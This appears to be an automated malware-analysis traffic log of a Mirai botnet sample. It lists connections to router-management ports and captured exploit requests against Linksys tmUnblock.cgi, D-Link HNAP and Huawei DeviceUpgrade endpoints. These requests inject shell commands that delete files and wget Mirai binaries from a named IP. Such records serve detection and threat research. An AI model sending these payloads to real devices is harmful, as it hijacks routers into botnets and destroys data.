| Source: unknown | Network traffic detected: HTTP traffic on port 56816 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46076 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37728 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46334 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54372 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43962 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 51548 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42458 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44162 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54396 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46156 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54404 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34852 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48044 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46966 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 42458 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42626 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36094 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60010 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47022 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60030 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43278 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35008 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 42626 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 36094 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36710 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36728 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46294 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55032 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59050 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46966 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39418 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37550 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55014 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43962 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54108 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54372 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54396 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47022 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36728 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36710 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50228 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50258 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36512 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36520 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46762 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54486 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54532 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44166 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40360 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37240 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33750 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46804 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 46762 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35924 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60010 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54404 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60030 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 46804 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56394 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43452 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56674 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 56394 |
| Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 56674 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58254 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54532 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39212 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49106 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32904 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47656 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34314 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58582 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42104 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34424 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34120 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34238 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57674 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56126 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49106 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58502 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38790 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40422 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36742 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38852 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44228 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37302 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58544 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33812 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33910 -> 7547 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43452 -> 55555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38834 -> 7547 |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
